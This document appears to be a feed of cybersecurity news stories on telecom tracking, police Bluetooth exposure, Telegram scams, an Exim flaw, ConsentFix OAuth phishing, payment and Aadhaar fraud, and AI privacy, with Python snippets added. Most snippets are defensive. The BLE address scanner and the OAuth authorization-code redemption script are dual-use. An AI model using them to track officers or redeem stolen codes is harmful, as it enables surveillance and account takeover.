How Telecom Systems Were Used to Secretly Track Mobile Users Worldwide

A new investigation by the digital rights research group Citizen Lab has revealed how weaknesses inside global telecom infrastructure were allegedly exploited to secretly monitor mobile phone users in more than ten countries over the past three years.

The findings, reviewed by Haaretz, highlight how parts of the global mobile network system, originally developed decades before smartphones existed, continue to expose users to modern surveillance risks despite the arrival of 4G and 5G technologies.

According to the report, researchers uncovered two separate surveillance operations that appear to be linked to commercial spyware and cyber intelligence vendors selling tracking capabilities to government clients worldwide. One of the operations reportedly used telecom infrastructure connected to Israeli providers 019Mobile and Partner Communications, although both companies denied involvement.

Researchers say the operations relied on weaknesses in SS7, an older telecom signaling protocol used globally to route phone calls, text messages, and roaming traffic between mobile operators. SS7 was designed during a period when telecom networks trusted one another by default, long before today’s cybersecurity threats emerged. Security experts have warned for years that attackers can abuse the protocol to monitor phone activity, intercept communications, or identify a user’s location.
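
SS7 location tracking typically abuses a small set of MAP signaling operations, such as anyTimeInterrogation, provideSubscriberInfo, and sendRoutingInfoForSM, sent from a peer network that the victim's operator implicitly trusts. As a purely hypothetical illustration of the kind of screening an operator might apply, the Python sketch below scans exported signaling records for those operations when they arrive from global titles outside a known roaming-partner allowlist; the file name and column names are assumptions, not details from Citizen Lab's findings.

```python
import csv

# MAP operations commonly associated with location tracking in public SS7 research.
LOCATION_OPS = {"anyTimeInterrogation", "provideSubscriberInfo", "sendRoutingInfoForSM"}

# Hypothetical allowlist of global titles belonging to legitimate roaming partners.
TRUSTED_GTS = {"972540000001", "447970000002"}

def flag_suspicious(path):
    """Yield signaling records that request subscriber location from an unknown origin."""
    with open(path, newline="") as f:
        # Assumed CSV columns: timestamp, origin_gt, operation, target_imsi
        for row in csv.DictReader(f):
            if row["operation"] in LOCATION_OPS and row["origin_gt"] not in TRUSTED_GTS:
                yield row

if __name__ == "__main__":
    for rec in flag_suspicious("signaling_events.csv"):
        print(f"{rec['timestamp']}  {rec['operation']:<24} from {rec['origin_gt']} -> IMSI {rec['target_imsi']}")
```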

The report states that some surveillance firms were able to impersonate legitimate mobile carriers and gain access to these legacy telecom systems in order to track users internationally. A second operation was reportedly linked to Fink Telecom Services, a Swiss company previously named in a 2023 investigation by Haaretz and Lighthouse Reports involving telecom surveillance services supplied to cyber intelligence vendors, including Rayzone.

Last week, British regulators reportedly moved to ban similar telecom signaling abuse practices, describing them as a major source of malicious activity affecting mobile networks. However, the new findings suggest that even newer systems built for 4G and 5G communications are vulnerable to similar exploitation.

One example highlighted in the report is Diameter, a signaling protocol widely used in 4G roaming and many 5G environments to manage subscriber connectivity and authentication. Although Diameter was introduced with stronger security protections than SS7, researchers found that attackers are still capable of abusing the system to conduct tracking operations.

In the first campaign identified by Citizen Lab, researchers documented more than 500 location-tracking attempts between November 2022 and 2025 across countries including Thailand, Bangladesh, Norway, Malaysia, South Africa, and several African nations. The investigation reportedly began after researchers observed a Middle Eastern businessman being repeatedly tracked over a four-hour period through international telecom queries.

Citizen Lab found that telecom identifiers associated with 019Mobile were used to send location-tracking requests through infrastructure connected to Partner Communications, which supports 019Mobile’s services. Another network route reportedly passed through Exelera Telecom, a communications and cloud services provider that also manages international fiber-optic infrastructure. Exelera did not publicly respond to requests for comment.

019Mobile’s head of security denied involvement and stated that the company operates as a virtual provider using another carrier’s infrastructure rather than maintaining its own roaming agreements. Researchers noted that attackers may have forged the company’s telecom identity to access the network.

Although Citizen Lab did not publicly identify the companies behind the operations, the report referenced several possible actors, including Cognyte. Internal files reviewed by Haaretz reportedly showed that Cognyte’s former parent company, Verint Systems, sold an SS7-based tracking product called SkyLock to a government customer in the Democratic Republic of Congo.

According to the report, SkyLock could reportedly locate mobile devices globally by exploiting telecom roaming systems. The documents also pointed to commercial relationships with telecom operators in Thailand, Malaysia, Indonesia, Vietnam, and Congo, several of which overlap with countries mentioned in the surveillance campaign.

Researchers also uncovered a more advanced surveillance method known as SIMjacking. The technique exploits vulnerabilities inside SIM cards by sending hidden binary text messages containing secret instructions. Once received, the SIM card can silently transmit the device’s location back to the attacker without displaying any visible warning or notification to the user.

Citizen Lab identified more than 15,700 suspected SIMjacking-related tracking attempts since late 2022. Researchers noted that when Haaretz and Lighthouse Reports first exposed Fink Telecom Services in 2023, the company had not yet been linked to the SIMjacking technique.

Cybersecurity experts warn that these attacks are especially concerning because they target weaknesses within telecom infrastructure itself rather than requiring malware installation or phishing attacks on individual devices. Researchers also cautioned that many telecom providers continue operating old and new signaling systems together, creating additional opportunities for attackers to bypass modern protections.

Fink Telecom Services, Exelera Telecom, Verint, and Cognyte did not publicly respond to the allegations referenced in the report. Partner Communications stated that it had no connection to the incident and rejected attempts to associate the company with the activity described by researchers.

Axon Police Taser and Body Camera Bluetooth Flaw Raises Officer Tracking Concerns

 

Australian police may unknowingly be exposing their live locations through Bluetooth-enabled devices made by Axon. Researchers discovered that body cameras and tasers used across the country broadcast signals without modern privacy protections, potentially allowing anyone nearby to detect and track officers in real time. 

Unlike smartphones that randomize Bluetooth MAC addresses to prevent tracking, Axon devices reportedly use static identifiers. This means simple apps or laptops can detect nearby police equipment and reveal device details, coordinates, and movement patterns. 
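
To see the difference in practice, the hedged Python sketch below uses the cross-platform bleak library to run several Bluetooth LE scans and report advertisers whose address appears in every round. A phone that rotates randomized addresses should drop out between rounds, while hardware with a static identifier keeps reappearing; the scan counts and intervals are arbitrary, and the script does not attempt to identify Axon equipment specifically.

```python
import asyncio
from collections import Counter

from bleak import BleakScanner  # pip install bleak

async def watch(rounds: int = 5, pause: float = 30.0):
    """Count how often each BLE address reappears across several scan rounds."""
    seen = Counter()
    names = {}
    for _ in range(rounds):
        for dev in await BleakScanner.discover(timeout=10.0):
            seen[dev.address] += 1
            names[dev.address] = dev.name
        await asyncio.sleep(pause)
    for addr, hits in seen.most_common():
        if hits == rounds:  # present in every round -> the address never rotated
            print(f"persistent advertiser: {addr}  name={names[addr]!r}")

if __name__ == "__main__":
    asyncio.run(watch())
```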

A security researcher demonstrated the issue in Melbourne using publicly available Android software capable of identifying Axon devices. Custom tools reportedly extended the tracking range to nearly 400 meters, raising concerns for undercover officers, tactical teams, and police returning home after shifts. 

Experts warn criminal groups could deploy low-cost Bluetooth scanners across neighborhoods to monitor police activity, detect raids, or map officer movement in real time. The flaw has reportedly been known since 2024, when warnings were sent to police agencies, ministers, federal authorities, and national security offices urging immediate action. 

Internal reviews within Victoria Police reportedly acknowledged the threat and recommended protections for covert units. However, after discussions with Axon, the issue was later downgraded internally. Victoria Police later stated there had been no confirmed cases of officers being tracked through the devices. Police agencies across New South Wales, Queensland, Western Australia, South Australia, Tasmania, the Northern Territory, and the Australian Federal Police were also informed of the vulnerability. 

Most declined to explain whether officers were warned or if safeguards had been introduced. Researchers believe the flaw stems from hardware design rather than software alone, making simple patches unlikely to fully resolve the problem. Fixing it may require redesigning core system components entirely. 

Axon has acknowledged on its security pages that its cameras emit detectable Bluetooth and Wi-Fi signals and advises customers to consider operational risks before deployment in sensitive situations. Critics argue these warnings remain buried in technical documentation instead of being clearly communicated to frontline officers. 

The issue highlights growing concerns about modern policing’s dependence on connected technology. As law enforcement increasingly relies on wireless devices, AI systems, and cloud-based tools, small cybersecurity flaws can quickly become serious operational and physical safety risks.

Hackers Exploit Telegram Mini Apps, Distribute Malware and Crypto Scams

 

Cybersecurity researchers have uncovered a large-scale fraud campaign that abuses Telegram's Mini App feature to run cryptocurrency scams, impersonate well-known brands, and spread Android malware.

FEMITBOT malware 


Researchers at CTM360 have dubbed the platform FEMITBOT, after a string present in its API responses. It uses Telegram bots and integrated Mini Apps to create believable, app-like experiences directly inside the messaging platform.

These Mini Apps are lightweight web apps that run within Telegram's built-in browser, allowing services like payments, interactive tools, and account access without needing users to leave the application.

Exploiting Telegram Mini Apps

The FEMITBOT platform is used for a variety of scams, including financial fraud and fake AI tools, streaming sites, and cryptocurrency platforms.

In several campaigns, the attackers imitated famous brands to boost engagement and credibility while reusing the same backend infrastructure across multiple Telegram bots and different domains.

Brands impersonated


Brands copied in this campaign include Disney, eBay, Youku, NVIDIA, MoonPay, Apple, and Coca-Cola. The campaign used a common backend: different phishing domains returned the same API response, "Welcome to join the FEMITBOT platform," indicating they all run on the same infrastructure.

Telegram bots abused


The campaign used Telegram bots to display phishing websites directly inside the messaging app. Once a user interacts with a bot and taps "Start," the bot launches a Mini App that loads a phishing page inside Telegram's default WebView, tricking the user into believing it is part of the application itself.
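
For context, the mechanism itself is the documented Telegram Bot API feature for opening a Mini App. The short sketch below, assuming the python-telegram-bot library (version 20 or later), shows how a /start handler can attach a button that loads an arbitrary URL inside Telegram's built-in WebView; the bot token and web app URL are placeholders, and the same mechanism serves legitimate Mini Apps and abusive ones alike.

```python
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update, WebAppInfo
from telegram.ext import ApplicationBuilder, CommandHandler, ContextTypes

BOT_TOKEN = "123456:EXAMPLE-TOKEN"            # placeholder
WEB_APP_URL = "https://example.com/miniapp"   # placeholder page shown inside the WebView

async def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    # Tapping the button opens WEB_APP_URL inside Telegram's WebView, so the page
    # appears to be part of the app itself -- the behaviour the campaign relies on.
    keyboard = InlineKeyboardMarkup(
        [[InlineKeyboardButton("Open app", web_app=WebAppInfo(url=WEB_APP_URL))]]
    )
    await update.message.reply_text("Welcome!", reply_markup=keyboard)

if __name__ == "__main__":
    app = ApplicationBuilder().token(BOT_TOKEN).build()
    app.add_handler(CommandHandler("start", start))
    app.run_polling()
```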

Tricking users via phishing tactics


After entering the system, targets are shown dashboards with fake balances, alongside fake countdown timers or limited-time offers designed to bait them.

When a user tries to withdraw money, they are asked to make a deposit or complete referral tasks first, a standard tactic in advance-fee and investment scams.

The infrastructure is built to be reused across multiple campaigns, so the attackers can easily switch between brands, themes, and languages. The campaigns also embed tracking scripts, such as TikTok and Meta tracking pixels, to trace user activity, optimize performance, and measure interactions.

Malware distribution via mini apps


Additionally, some Mini Apps attempted to spread malware through Android APKs posing as companies such as the BBC, NVIDIA, CineTV, CoreWeave, and Claro.

“Built on a modular, template-driven architecture, FEMITBOT enables rapid deployment, brand impersonation, and campaign optimization using real-time tracking and analytics. This reflects a shift toward scalable, marketing-like fraud operations designed to maximize user conversion and financial gain,” the report said.

Critical Exim Flaw Exposes Email Servers to Remote Code Execution Risk

 

A newly discovered security vulnerability in the widely used mail transfer agent Exim has raised serious concerns among cybersecurity experts, as attackers could exploit the flaw to potentially execute malicious code remotely on vulnerable email servers.

According to researchers, the vulnerability occurs due to improper memory handling during the TLS session shutdown process. The issue specifically affects Exim installations using GnuTLS configurations.

“This sequence of events can cause Exim to write into a memory buffer that has already been freed during the TLS session teardown, leading to heap corruption. An attacker only needs to be able to establish a TLS connection and use the CHUNKING (BDAT) SMTP extension.”

Security experts confirmed that all Exim versions starting from 4.97 through 4.99.2 are vulnerable. However, systems relying on OpenSSL or other TLS libraries are not affected, as the flaw only impacts builds compiled with USE_GNUTLS=yes.
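
Administrators who want a quick exposure check could use something like the Python sketch below, which runs the standard `exim -bV` command and looks for a version in the affected range together with a GnuTLS build. The exact wording of the build output varies between distributions, so the string matching here is an assumption rather than a definitive test.

```python
import re
import subprocess

AFFECTED_MIN, AFFECTED_MAX = (4, 97, 0), (4, 99, 2)  # per the advisory: 4.97 through 4.99.2

def parse_version(text):
    m = re.search(r"Exim version (\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else None

def check():
    out = subprocess.run(["exim", "-bV"], capture_output=True, text=True).stdout
    version = parse_version(out)
    uses_gnutls = "GnuTLS" in out  # assumes the build info names the TLS library
    if version is None:
        print("could not determine Exim version from 'exim -bV' output")
    elif AFFECTED_MIN <= version <= AFFECTED_MAX and uses_gnutls:
        print(f"Exim {'.'.join(map(str, version))} built with GnuTLS: upgrade to 4.99.3")
    else:
        print(f"Exim {'.'.join(map(str, version))}: not in the affected configuration")

if __name__ == "__main__":
    check()
```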

The vulnerability was identified by Federico Kirschbaum, Head of Security Lab at XBOW, an autonomous cybersecurity testing platform, who reported the issue on May 1, 2026.

“During TLS shutdown, Exim frees its TLS transfer buffer – but a nested BDAT receive wrapper can still process incoming bytes and end up calling ungetc(), which writes a single character (\n) into the freed region,” Kirschbaum said. “That one-byte write lands on Exim's allocator metadata, corrupting the allocator's internal shape; the exploit then leverages that corruption to gain further primitives.”

XBOW described the flaw as one of the most severe vulnerabilities uncovered in Exim in recent years, noting that attackers require minimal server-side configuration to trigger the exploit successfully.

To address the issue, Exim developers released version 4.99.3 and urged administrators to upgrade immediately. The developers also clarified that no temporary workaround or mitigation is currently available.

“The fix ensures that the input processing stack is cleanly reset when a TLS close notification is received during an active BDAT transfer, preventing the stale pointers from being used,” Exim noted.

This is not the first major security concern involving Exim. Back in 2017, the platform fixed another critical use-after-free vulnerability, tracked as CVE-2017-16943, which allowed unauthenticated attackers to execute remote code using specially crafted BDAT commands and potentially take control of email servers.

Automated OAuth Abuse by ConsentFix v3 Raises Azure Security Concerns


 

Researchers have identified a new phishing framework, dubbed ConsentFix v3, that can systematically compromise Microsoft Azure accounts through automated OAuth abuse, marking a significant escalation in identity-based attacks on cloud environments.

The latest iteration combines large-scale social engineering, tenant reconnaissance, and automated token harvesting into a coordinated attack chain designed to bypass conventional security controls, an advanced evolution of previous ConsentFix campaigns. By abusing weaknesses in the OAuth2 authorization code flow, attackers can manipulate authentication consent mechanisms and gain persistent access to enterprise environments.

Another defining element of the campaign is the use of Pipedream, a serverless integration platform leveraged to automate authorization code collection, refresh token generation, and data exfiltration workflows, significantly improving the scale and operational efficiency of the intrusion process. 

According to the report, attackers initiate compromises by validating Azure tenant IDs and profiling employees for targeted impersonation. Phishing infrastructure is then deployed across multiple online services to support credential deception, token interception, and long-term account persistence.

ConsentFix v3 represents a rapid evolution of OAuth-related phishing methodologies. Late last year, Push Security introduced the original ConsentFix technique as a ClickFix-inspired attack targeting Microsoft authentication workflows, which attracted attention. An early variant of this attack relied heavily on social engineering techniques to trick victims into completing a legitimate Azure CLI login sequence and manually pasting a localhost URL containing an authorization code. 

Once that code was captured, attackers could hijack Microsoft accounts without stealing a password, effectively bypassing multi-factor authentication by abusing trusted identity processes rather than exploiting endpoint vulnerabilities. To streamline the phishing chain, researcher John Hammond developed refinements that eventually became ConsentFix v2, which replaced the manual copy-and-paste interaction with a drag-and-drop mechanism for the localhost URL, improving both the realism of the deception and its success rate.

ConsentFix v3 continues to weaponize the OAuth2 authorization code flow while abusing Microsoft first-party applications that are already trusted and pre-consented within enterprise environments. The attack model is extended by enhanced automation, broader scalability, and infrastructure designed to support high-volume token interception across Azure tenants.

A systematic operational analysis of ConsentFix v3 indicates that the campaign is organized around a multi-stage intrusion workflow that maximizes both authenticity and the efficiency of token acquisition. The threat actors reportedly conduct extensive reconnaissance on targeted Azure environments, validate tenant identifiers, and aggregate employee intelligence, including corporate email addresses, organizational roles, and identity metadata, to support highly tailored impersonation attempts.

The campaign infrastructure relies on Cloudflare Pages for phishing page hosting and Pipedream for backend automation, enabling attackers to coordinate credential lures, webhook execution, and token collection through a highly scalable framework. Victims are then targeted with carefully crafted phishing emails containing embedded document links that lead to fake Microsoft authentication portals, which in turn trigger legitimate OAuth login requests. Because the sign-in itself is genuine, the technique increases user trust and strips away many conventional phishing indicators.

After the user interacts with the lure, the attack moves into the exploitation phase, where victims are manipulated into copying, pasting, or otherwise interacting with localhost URLs containing OAuth authorization codes. Once intercepted, the authorization codes are transmitted to attacker-controlled infrastructure, where automated workflows use Microsoft APIs to exchange them for access and refresh tokens capable of granting unauthorized access to mailboxes, cloud storage, and internal enterprise data.
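
To make clear why an intercepted code is so valuable, the minimal Python sketch below shows the standard, publicly documented OAuth2 authorization-code exchange against the Microsoft identity platform token endpoint. The tenant, client ID, and redirect URI are placeholders rather than details of the campaign; for a public (native) client, whoever holds a valid code and the matching redirect URI can redeem it for access and refresh tokens.

```python
import requests

TENANT = "common"                                     # placeholder tenant
CLIENT_ID = "00000000-0000-0000-0000-000000000000"    # placeholder public-client application ID
REDIRECT_URI = "http://localhost:8400"                # native/desktop flows commonly use localhost redirects
TOKEN_URL = f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token"

def redeem_code(auth_code: str) -> dict:
    """Exchange an authorization code for tokens via the standard OAuth2 grant."""
    resp = requests.post(TOKEN_URL, data={
        "client_id": CLIENT_ID,
        "grant_type": "authorization_code",
        "code": auth_code,
        "redirect_uri": REDIRECT_URI,
        "scope": "offline_access https://graph.microsoft.com/.default",
    })
    resp.raise_for_status()
    # The response contains an access_token and, because offline_access was
    # requested, a refresh_token that keeps working long after the phish.
    return resp.json()
```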

According to researchers, the abuse of Microsoft's Family of Client IDs (FOCI) functionality further amplifies the threat by enabling token reuse between multiple trusted Microsoft applications, which provides attackers with greater persistence and lateral access without having to repeatedly complete authentication procedures. 

Consequently, the campaign highlights persistent architectural weaknesses associated with OAuth-based trust models and token-centric authentication mechanisms, resulting in a renewed emphasis on defensive measures, such as enforcing granular conditional access policies, binding tokens to managed devices, monitoring anomalous non-interactive sign-ins, and revoking refresh tokens immediately upon suspicion of compromise. 

Security teams are also being encouraged to tighten consent controls, reduce excessive permission exposure, and continuously audit authentication telemetry in order to detect signs of advanced OAuth abuse before it can establish long-term persistence.

Researchers observed substantial operational overlap between ConsentFix and device code phishing, as both techniques abuse OAuth authorization workflows to bypass traditional authentication barriers and achieve unauthorized token issuance without directly stealing credentials. The primary distinction between the two techniques lies in the OAuth mechanisms they exploit. 

Device code phishing abuses the device authorization grant defined in RFC 8628, whereas ConsentFix targets the authorization code grant outlined in RFC 6749, particularly within native and desktop application flows that rely on localhost redirects. The two attack paths converge within the same token issuance infrastructure, regardless of their differences in execution. Therefore, attackers' access level is less dependent on the OAuth flow than it is on the targeted application, its permission scopes, and user privileges. 

Both authentication flows ultimately allow threat actors to obtain highly valuable authentication artifacts capable of sustaining persistent access across cloud environments. Further, researchers report that attackers are increasingly targeting Microsoft applications classified under the Family of Client IDs (FOCI) model due to their portability and utility after compromise, particularly against non-administrative enterprise users. 

Attacking FOCI-enabled applications via ConsentFix or device code phishing lets operators silently pivot between interconnected Microsoft services such as Outlook, Teams, OneDrive, and SharePoint through API-based access, without repeatedly authenticating. More advanced operators may escalate the intrusion by abusing Primary Refresh Tokens (PRTs), a technique that allows seamless single sign-on across applications and browser sessions connected to Entra ID.

Such escalation commonly involves abusing the Microsoft Authentication Broker application and chaining the compromise into a rogue device registration within the victim environment, mirroring tactics previously associated with Storm-2372 during large-scale device code phishing campaigns in 2025. 

Researchers believe ConsentFix v3 currently resembles an operational proof of concept more than a fully industrialized phishing-as-a-service platform. Even so, its reliance on legitimate SaaS tools and readily accessible automation infrastructure, combined with minimal custom development overhead, demonstrates just how quickly sophisticated OAuth abuse can be operationalized.

The campaign has also intensified the need for a shift in defensive strategy, particularly because browser-based identity attacks continue to bypass many conventional endpoint protections. To detect malicious OAuth activity occurring within trusted authentication sessions, organizations need to combine real-time behavioral monitoring with identity-aware threat hunting.

Traditional mitigations recommended for device code phishing, including disabling the device code flow through conditional access policies, offer only partial protection against ConsentFix because the framework abuses a separate authentication pathway. Rather than leaving vulnerable applications exposed to OAuth token phishing, defenders are advised to create dedicated Service Principals and restrict access to explicitly authorized users.

Defenders should also proactively search authentication logs for suspicious application and resource identifiers, correlate inconsistencies between the initial login IP address and subsequent token activity, and closely monitor anomalous session behavior that could indicate attacker control following a legitimate authentication.
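
As a starting point for that kind of hunting, the hedged sketch below queries the Microsoft Graph sign-in log endpoint (auditLogs/signIns, readable with the AuditLog.Read.All permission) for recent sign-ins tied to one application ID, so their source IP addresses can be compared against a user's usual locations. The access token and application ID are placeholders, and result paging is omitted for brevity.

```python
from datetime import datetime, timedelta, timezone

import requests

GRAPH_SIGNINS = "https://graph.microsoft.com/v1.0/auditLogs/signIns"
ACCESS_TOKEN = "<token with AuditLog.Read.All>"            # placeholder
SUSPECT_APP_ID = "00000000-0000-0000-0000-000000000000"    # placeholder application (client) ID

def recent_signins(hours: int = 24):
    since = (datetime.now(timezone.utc) - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    params = {"$filter": f"appId eq '{SUSPECT_APP_ID}' and createdDateTime ge {since}"}
    resp = requests.get(GRAPH_SIGNINS, params=params,
                        headers={"Authorization": f"Bearer {ACCESS_TOKEN}"})
    resp.raise_for_status()
    for s in resp.json().get("value", []):
        # Compare each token-issuing sign-in's source IP with the user's normal locations.
        print(s["createdDateTime"], s["userPrincipalName"], s["ipAddress"], s.get("clientAppUsed"))

if __name__ == "__main__":
    recent_signins()
```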

The emergence of ConsentFix v3 reflects a broader trend in the modern threat landscape in which cybercriminals increasingly target identity infrastructure and trusted authentication frameworks rather than relying on malware and credential theft alone. By abusing legitimate OAuth workflows and cloud-native services, the campaign demonstrates how adversaries can gain persistent access to enterprise environments while remaining difficult to detect with conventional security mechanisms. According to the research, similar techniques are likely to become more widely operationalized across cloud ecosystems as automation, token abuse, and SaaS-based attack infrastructure mature.

The findings reinforce the growing urgency for organizations to strengthen identity-centric defenses, continuously monitor authentication behavior, and re-evaluate the trust relationships embedded within modern cloud platforms before OAuth-driven intrusions become a mainstream enterprise threat vector.

Experts Say ‘Ghost Tapping’ Payment Scams Are Uncommon, But Consumers Should Still Stay Alert

 

As contactless payment systems become increasingly common at stores, public events, and seasonal markets, cybersecurity and payment security experts are reminding consumers to remain aware of how digital transactions work and to regularly monitor their financial activity. The warning follows growing discussions around so-called “ghost tapping” scams, a term used to describe situations where a payment could allegedly be processed through a smartphone’s tap-to-pay feature without the owner intentionally authorizing the transaction.

Despite online concern surrounding the issue, consumer protection specialists say incidents involving “ghost tapping” remain highly uncommon. Erin McGovern, a consumer protection official who has been monitoring complaints linked to the scam, said her organization has received fewer than 10 reports connected to these cases so far. However, she cautioned that risks associated with payment fraud may become more noticeable during busy shopping periods such as holiday markets, craft fairs, and seasonal events where large numbers of people rely on mobile payment systems for convenience.

At these public events, many vendors use portable payment terminals that allow customers to quickly complete purchases using smartphones or digital wallets instead of physical cash or bank cards. McGovern explained that while the speed and convenience of tap-to-pay technology make shopping easier, consumers should still remain careful about confirming the exact amount being charged before approving any transaction. She noted that shoppers sometimes become distracted in crowded environments, making it easier to overlook suspicious activity or incorrect payment totals.

The discussion around “ghost tapping” has raised concerns online because many consumers are unfamiliar with the technical limitations of contactless payment systems. Security specialists explain that tap-to-pay technology operates through Near Field Communication, commonly known as NFC. This wireless communication technology allows devices such as smartphones, smartwatches, and payment terminals to exchange encrypted payment information when placed extremely close together.

According to payment security experts, NFC technology only functions across a very short range, typically four centimeters or less. Michael Jabbara, Senior Vice President and Head of Payment Ecosystem Risk and Control at Visa, explained that the required distance is approximately the size of a small paper clip. Because of this limitation, an individual attempting to secretly trigger a payment would need to move unusually close to another person’s phone or pocket.

Jabbara stated that most people would naturally notice if someone entered their personal space to that extent. For that reason, experts say it would be highly difficult for a scammer to perform an unauthorized tap-to-pay transaction without drawing attention. While researchers acknowledge that such activity may be technically possible under certain conditions, they emphasize that it would be extremely unusual for it to happen without the victim becoming aware of suspicious behavior.

Still, cybersecurity professionals say the conversation surrounding “ghost tapping” highlights a broader and more realistic concern: many consumers fail to regularly review their banking activity or payment notifications. According to Jabbara, fraudsters often depend on victims ignoring account activity until the end of the month or waiting several weeks before reviewing statements. This delay can allow unauthorized purchases to remain undetected long enough for scammers to continue exploiting stolen payment information.

Financial security experts recommend reviewing banking applications, credit card activity, and digital wallet transactions frequently instead of waiting until a dispute becomes necessary. Early detection of suspicious purchases significantly increases the chances of stopping additional fraudulent activity and recovering lost funds.

Consumer protection authorities also note that individuals who believe they were targeted by payment fraud can dispute unauthorized charges directly with their bank or credit card provider. In some cases, victims may also submit formal complaints to their local attorney general’s office or consumer protection agencies for further investigation.

However, specialists say prevention remains the most effective defense against digital payment scams. One of the strongest recommendations from payment security experts is enabling instant transaction alerts through banking and credit card applications. Many financial institutions already use automated fraud-detection systems that analyze unusual spending behavior and risk patterns before approving transactions. Even so, transaction alerts provide another important layer of protection by notifying users immediately whenever money is spent through their account.

These notifications can help consumers quickly identify purchases linked to unfamiliar merchant names, unexpected locations, or payment amounts they did not approve. Experts say immediate awareness often prevents fraud from escalating into larger financial losses.

Another important safety measure is always requesting a receipt after making a purchase. Receipts serve as proof of payment and can become important evidence if consumers later need to challenge suspicious charges with their bank or payment provider. McGovern warned that vendors refusing to provide receipts or claiming that their payment system is suddenly malfunctioning could represent a potential warning sign of fraudulent behavior.

Cybersecurity analysts additionally point out that modern digital wallet systems, including services such as Apple Pay and Google Pay, already contain multiple layers of security protection. These systems rely on technologies such as tokenization and encryption, which help prevent actual card numbers from being directly exposed during transactions. Instead of transmitting sensitive banking details, digital wallets generate encrypted payment tokens designed to reduce the likelihood of financial data theft.

Although security protections built into modern payment platforms have substantially reduced many traditional forms of card fraud, experts caution that scammers continuously adapt their tactics as digital payment technology evolves. For that reason, cybersecurity professionals stress that awareness, regular account monitoring, transaction alerts, and cautious payment habits remain essential safeguards for consumers using contactless payment systems.

AI Deepfake Scam Changes Aadhaar Mobile Without OTP

 

AI-enabled fraudsters are now using deepfake tools to change Aadhaar details, such as the mobile number linked to an account, without victims noticing, enabling identity theft and loan fraud.

In Ahmedabad, cybercrime investigators uncovered a racket that quietly replaced victims’ Aadhaar-linked mobile numbers and then used those new numbers to intercept OTPs and take control of digital services, including DigiLocker and banking apps. The gang reportedly collected Aadhaar numbers, photographs and other personal data from leaks and social media, then used AI software to turn still photos into short “blink” videos that mimic liveness checks and fool verification systems. 

Once the fraudsters changed the registered mobile number, they could receive OTPs and update KYC details, effectively hijacking victims’ digital identities and applying for loans or accessing accounts in their names. Police say the operation was organised with distinct roles: some members sourced data and photos, others used Aadhaar update kits—often through Common Service Centres (CSCs)—to make unauthorised changes, and specialists created deepfake clips to pass biometric checks.

Authorities arrested several suspects after a businessman reported that his Aadhaar-linked number was altered without any OTP or call alerts, revealing how smoothly the criminals combined social engineering, physical update kits, and AI manipulation to bypass safeguards. Reports indicate the attackers exploited weaknesses in offline update workflows and gaps in liveness-detection systems that still accept AI-generated motion as genuine.

Safety recommendations 

To protect yourself, regularly verify the mobile number linked to your Aadhaar and lock your biometrics using official mAadhaar or UIDAI services when not in use. Monitor DigiLocker and bank accounts for unexpected changes and set up transaction alerts with your bank; if you spot unusual activity, report it immediately to local cybercrime units or UIDAI’s helplines. Avoid uploading Aadhaar photos or documents on unfamiliar platforms and be cautious about sharing personal information on social media, which criminals can reuse to create realistic deepfakes. 

Longer-term fixes will require stricter controls around Aadhaar update kits at CSCs, better audit trails for demographic changes, and improved liveness-detection algorithms that can distinguish AI-generated clips from real facial movement. Experts and regulators also urge faster data-breach notification rules and tighter controls on access to identity databases so criminals cannot easily assemble the building blocks for such attacks. Until these systemic changes arrive, vigilance, biometric locks, and immediate reporting remain the best defenses for citizens.

AI Chatbot Training Raises Growing Privacy and Data Security Concerns

 

Most conversations with AI bots carry hidden layers behind simple replies. While offering answers, some firms quietly gather exchanges to refine machine learning models. Personal thoughts, job-related facts, or private topics might slip into data pools shaping tomorrow's algorithms. Experts studying digital privacy point out people rarely notice how freely they share in routine bot talks. Hidden purposes linger beneath what seems like casual back-and-forth. Most chatbots rely on what experts call a large language model. 

Through exposure to massive volumes of text - pulled from sites, online discussions, video transcripts, published works, and similar open resources - these models grow sharper. Exposure shapes their ability to spot trends, suggest fitting answers, and produce dialogue resembling natural speech. As their learning material expands, so does their skill in managing complex questions and forming thorough outputs. Wider input often means smoother interactions. 

Still, official data isn’t what fills these models alone. Input from people using apps now feeds just as much raw material to tech firms building artificial intelligence. Each message entered into a conversational program might later get saved, studied, then applied to sharpen how future versions respond. Often, that process runs by default - only pausing if someone actively adjusts their preferences or chooses to withdraw when given the chance. Worries about digital privacy keep rising.

Talking to artificial intelligence systems means sharing intimate details - things like medical issues, money problems, mental health, job conflicts, legal questions, or relationship secrets. Even though firms say data gets stripped of identities prior to being used in machine learning, skeptics point out people must rely on assurances they can’t personally check. 

Some data marked as private today might lose that status later. Experts who study system safety often point out how new tools or pattern-matching tricks could link disguised inputs to real people down the line. Talks involving personal topics kept inside artificial intelligence platforms can thus pose hidden exposure dangers years after they happen. Most jobs now involve some form of digital tool interaction. 

As staff turn to AI assistants for tasks like interpreting files, generating scripts, organizing data tables, composing summaries, or solving tech glitches, risks grow quietly. Information meant to stay inside - such as sensitive project notes, client histories, budget figures, unique program logic, compliance paperwork, or strategic plans - can slip out without warning. When typed into an assistant interface, those fragments might linger in remote servers, later shaping how the system responds to others. Hidden patterns emerge where private inputs feed public outputs. 

One concern among privacy experts involves possible legal risks for firms in tightly controlled sectors. When companies send sensitive details - like internal strategies or customer records - to artificial intelligence tools without caution, trouble might follow. Problems may emerge later, such as failing to meet confidentiality duties or drawing attention from oversight authorities. These exposures stem not from malice but from routine actions taken too quickly. 

Because reliance on AI helpers keeps rising, people and companies must reconsider what details they hand over to chatbots. Speedy answers tend to push aside careful thinking, particularly when automated aids respond quickly with helpful outcomes. Still, specialists insist grasping how these learning models are built matters greatly - especially for shielding private data and corporate secrets amid expanding artificial intelligence use.

22-Year-Old Developer Reverse-Engineers Claude Mythos, Shocking the Tech Industry

 


Earlier this year, AI giant Anthropic launched a powerful new model called Claude Mythos. It caused a storm in Silicon Valley and across the tech industry: the general-purpose model could find software bugs that no human knew existed.

About Claude Mythos


Anthropic did not, however, launch Mythos to the world. It offered the model only to cybersecurity experts at large organizations that build or operate critical software infrastructure, asking them to find and patch flaws before Anthropic released it commercially to the public.

